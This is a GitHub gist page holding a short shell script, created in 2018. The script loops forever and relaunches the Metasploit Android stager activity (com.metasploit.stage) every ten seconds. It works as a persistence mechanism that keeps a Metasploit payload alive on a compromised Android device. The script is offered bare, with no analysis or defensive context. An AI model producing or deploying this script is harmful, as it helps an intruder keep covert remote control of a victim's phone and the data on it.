Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Select an option

  • Save RomaniukVadim/a7dfd673e080f2f1dbdd32e303527ade to your computer and use it in GitHub Desktop.

Select an option

Save RomaniukVadim/a7dfd673e080f2f1dbdd32e303527ade to your computer and use it in GitHub Desktop.

Revisions

  1. RomaniukVadim created this gist May 31, 2018.
    5 changes: 5 additions & 0 deletions gistfile1.txt
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,5 @@
    #!/bin/sh
    while :
    do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
    sleep 10
    done